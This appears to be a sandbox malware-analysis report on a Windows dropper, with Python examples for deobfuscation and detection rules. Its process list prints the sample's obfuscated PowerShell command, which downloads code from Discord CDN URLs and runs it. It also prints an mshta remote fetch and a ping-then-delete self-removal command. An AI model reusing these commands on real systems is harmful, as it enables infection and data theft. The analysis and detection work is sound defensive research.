| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Zoom | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionHigh = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "335085935" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{A57F05BD-B1F6-4191-9594-BECBEFA5900F}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$blogger | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164C = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Extensible Cache | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| N/A | N/A | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe
"C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe"
C:\Users\Admin\AppData\Local\Temp\936213988.exe
C:\Users\Admin\AppData\Local\Temp\936213988.exe
C:\Users\Admin\AppData\Local\Temp\936213988.exe
C:\Users\Admin\AppData\Local\Temp\936213988.exe
C:\Users\Admin\AppData\Local\Temp\936213988.exe
C:\Users\Admin\AppData\Local\Temp\936213988.exe
C:\Users\Admin\AppData\Local\Temp\1137791014.exe
C:\Users\Admin\AppData\Local\Temp\1137791014.exe
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/875766613159333928/875767110058532884/geometre.txt
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://cdn.discordapp.com/attachments/875766613159333928/875766957905969182/matematecle.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe & exit
C:\Windows\SysWOW64\PING.EXE
ping 0
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
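The powershell.exe command line above hides every meaningful string behind .Replace() calls over junk padding and invokes Invoke-Expression as &('I'+'EX'), so a keyword search for IEX or DownloadString on the raw line finds nothing. None of that needs a sandbox to undo: the transformations are pure string operations, so they can be replayed statically. The Python below is an added example (not part of this report and not code from the sample); it replays the .Replace() chains, resolves the $variable references the way IEX expands them when it runs the assembled string, and reports the second-stage URL. It assumes the one-liner uses only single-quoted literals and chained .Replace() calls, which is what the captured command line shows.

```python
import re

# The obfuscated one-liner as captured in the Processes list, copied verbatim
# and split into one fragment per statement so it stays readable.
SCRIPT = (
    "$SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://cdn.discordapp.com/attachments/875766613159333928/875766957905969182/matematecle.txt';"
    "$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'"
    ".Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');"
    "$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'"
    ".Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE')"
    ".Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');"
    "$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT "
    "$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'"
    ".Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O')"
    ".Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');"
    "$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');"
)

# $name = 'literal' followed by zero or more .Replace('old','new') calls
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'((?:\.Replace\('[^']*','[^']*'\))*)")
REPLACE_RE = re.compile(r"\.Replace\('([^']*)','([^']*)'\)")
# 'a'+'b'+... literal concatenation, the trick used to spell IEX
CONCAT_RE = re.compile(r"'[^']*'(?:\s*\+\s*'[^']*')+")
IEX_ARG_RE = re.compile(r"&\('IEX'\)\(\$(\w+)", re.I)
URL_RE = re.compile(r"https?://[^\s'\")]+")


def join_concats(script):
    """Collapse 'I'+'EX' style concatenations into a single literal."""
    return CONCAT_RE.sub(
        lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'", script)


def decode_assignments(script):
    """Replay every $name = 'literal'.Replace(old, new)... chain statically."""
    values = {}
    for name, literal, chain in ASSIGN_RE.findall(script):
        value = literal
        for old, new in REPLACE_RE.findall(chain):
            # .NET String.Replace: every occurrence, case-sensitive, same as str.replace
            value = value.replace(old, new)
        values[name] = value
    return values


def expand_variables(text, values):
    """Substitute $name references the way IEX does when it runs the string."""
    for name in sorted(values, key=len, reverse=True):  # longest first: no prefix clashes
        text = text.replace("$" + name, values[name])
    return text


def recover_stage(script):
    """Return the command the first &('I'+'EX') actually executes."""
    values = decode_assignments(script)
    m = IEX_ARG_RE.search(join_concats(script))
    if not m or m.group(1) not in values:
        raise ValueError("no &('IEX')($variable) call found")
    return expand_variables(values[m.group(1)], values)


def extract_urls(text):
    return URL_RE.findall(text)


if __name__ == "__main__":
    for name, value in decode_assignments(SCRIPT).items():
        print(f"${name} = {value!r}")
    stage = recover_stage(SCRIPT)
    print("IEX runs:", stage)
    print("second-stage URL(s):", extract_urls(stage))
```

The recovered statement is (NEW-OBJECT SYSTEM.NET.WEBClIENT ).DOWNLOADSTRING('https://cdn.discordapp.com/.../matematecle.txt'): a WebClient download whose body is piped into the second &('I'+'EX'). That is why cdn.discordapp.com shows up twice in the network table (geometre.txt fetched by mshta.exe, matematecle.txt by this stage). The body of matematecle.txt is not part of this report, so what the second IEX executed cannot be recovered from the page.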
Network
| Country | Destination | Domain | Proto |
| N/A | 8.8.8.8:53 | iplogger.com | udp |
| N/A | 88.99.66.31:443 | iplogger.com | tcp |
| N/A | 8.8.8.8:53 | x1.c.lencr.org | udp |
| N/A | 104.73.131.204:80 | x1.c.lencr.org | tcp |
| N/A | 8.8.8.8:53 | loadexpert.info | udp |
| N/A | 45.139.184.124:80 | loadexpert.info | tcp |
| N/A | 8.8.8.8:53 | cdn.discordapp.com | udp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | cookiebrokrash.info | udp |
| N/A | 45.139.184.124:80 | cookiebrokrash.info | tcp |
| N/A | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| N/A | 8.8.8.8:53 | www.binance.com | udp |
| N/A | 13.227.222.68:443 | www.binance.com | tcp |
| N/A | 13.227.222.68:443 | www.binance.com | tcp |
| N/A | 8.8.8.8:53 | accounts.binance.com | udp |
| N/A | 52.222.139.46:443 | accounts.binance.com | tcp |
| N/A | 52.222.139.46:443 | accounts.binance.com | tcp |
| N/A | 8.8.8.8:53 | bin.bnbstatic.com | udp |
| N/A | 13.227.222.47:443 | bin.bnbstatic.com | tcp |
| N/A | 13.227.222.47:443 | bin.bnbstatic.com | tcp |
| N/A | 8.8.8.8:53 | api.ip.sb | udp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| N/A | 142.250.102.154:443 | stats.g.doubleclick.net | tcp |
| N/A | 142.250.102.154:443 | stats.g.doubleclick.net | tcp |
| N/A | 13.227.222.47:443 | bin.bnbstatic.com | tcp |
| N/A | 13.227.222.47:443 | bin.bnbstatic.com | tcp |
| N/A | 8.8.8.8:53 | lllwyerxedo.xyz | udp |
| N/A | 93.189.40.76:80 | lllwyerxedo.xyz | tcp |
| N/A | 104.26.12.31:443 | api.ip.sb | tcp |
| N/A | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| N/A | 8.8.8.8:53 | www.microsoft.com | udp |
| N/A | 8.8.8.8:53 | www.bing.com | udp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
| N/A | 204.79.197.200:443 | www.bing.com | tcp |
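Read together, the Processes list and the network table contain four behaviours a detection engineer would key on: cmd.exe /k ping 0 & del <sample path> & exit, a sleep-then-delete idiom that removes the dropper after it has done its work (the "Deletes itself" and "Runs ping.exe" signatures); mshta.exe started with an https URL as its only argument; powershell.exe combining a concatenated 'I'+'EX' with a download; and aspnet_compiler.exe started with an empty command line, which is not how a build tool is normally used (it is the process the report lists under EnumeratesProcesses). The Python below is an added example, not part of this report: it runs those four checks over process-creation records constructed from the Processes list above. The PowerShell command line is shortened to its effective form (the full captured line is in the report), and the extra utility names in DOTNET_TOOLS are an assumption; only aspnet_compiler.exe appears on this page.

```python
import re

# (image path, command line) records constructed from the Processes list.
PROCESSES = [
    (r"C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe",
     r'"C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe"'),
    (r"C:\Users\Admin\AppData\Local\Temp\936213988.exe",
     r"C:\Users\Admin\AppData\Local\Temp\936213988.exe"),
    (r"C:\Users\Admin\AppData\Local\Temp\1137791014.exe",
     r"C:\Users\Admin\AppData\Local\Temp\1137791014.exe"),
    (r"C:\Windows\System32\mshta.exe",
     r'"C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/875766613159333928/875767110058532884/geometre.txt'),
    # shortened to its effective form; the captured line is far longer
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $U='https://cdn.discordapp.com/attachments/875766613159333928/875766957905969182/matematecle.txt';&('I'+'EX')((NEW-OBJECT SYSTEM.NET.WEBClIENT).DOWNLOADSTRING($U))|&('I'+'EX')'''),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe & exit'),
    (r"C:\Windows\SysWOW64\PING.EXE", "ping 0"),
    (r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe",
     r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"'),
    (r"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe",
     r'"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca'),
]

DEL_RE = re.compile(r'\bdel\s+"?([^"&]+?)"?\s*(?:&|$)', re.I)
IEX_RE = re.compile(r"\biex\b|invoke-expression|'i'\s*\+\s*'ex'", re.I)
FETCH_RE = re.compile(r"downloadstring|downloadfile|https?://", re.I)
# .NET framework utilities that should never start with an empty command line.
# Only aspnet_compiler.exe is on this page; the other names are an assumption.
DOTNET_TOOLS = {"aspnet_compiler.exe", "regasm.exe", "regsvcs.exe",
                "installutil.exe", "msbuild.exe"}


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def args_of(cmdline):
    """Everything after the (possibly quoted) program token."""
    m = re.match(r'\s*(?:"[^"]*"|\S+)\s*(.*)$', cmdline, re.S)
    return m.group(1).strip() if m else ""


def triage(processes):
    """Return (rule, command line) pairs for every record that matches a rule."""
    images = {path.lower() for path, _ in processes}
    findings = []
    for path, cmdline in processes:
        name, args = image_name(path), args_of(cmdline)
        if name == "cmd.exe":
            m = DEL_RE.search(cmdline)
            # 'ping N & del <file>' is sleep-then-delete; it is self deletion
            # when <file> is the image of a process in the same chain.
            if (m and re.search(r"\bping\b", cmdline, re.I)
                    and m.group(1).strip().lower() in images):
                findings.append(("self_delete_via_ping", cmdline))
        elif name == "mshta.exe" and re.search(r"\bhttps?://", args, re.I):
            findings.append(("mshta_remote_url", cmdline))
        elif (name in ("powershell.exe", "pwsh.exe")
                and IEX_RE.search(args) and FETCH_RE.search(args)):
            findings.append(("powershell_download_and_iex", cmdline))
        elif name in DOTNET_TOOLS and args == "":
            findings.append(("dotnet_utility_no_args", cmdline))
    return findings


if __name__ == "__main__":
    for rule, cmdline in triage(PROCESSES):
        print(f"{rule:28} {cmdline[:90]}")
```

The self-delete rule deliberately requires the deleted path to be the image of another process in the same chain; a bare "ping & del" on a log file is routine scripting and would otherwise drown the alert. The empty-command-line check on aspnet_compiler.exe says nothing about what now runs inside it; it only flags that the process deserves a memory dump, which is exactly what the Files section below lists for several PIDs.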
Files
memory/2988-114-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\936213988.exe
| MD5 | 9281db9b395b406a6c2107625502d8ff |
| SHA1 | 07d6d1996e04b863c162d5f93b02fd58ca881177 |
| SHA256 | 72b31e583907d15bb1e8ec5a37dc088b03daa50d58ce611d72aa7ab292824006 |
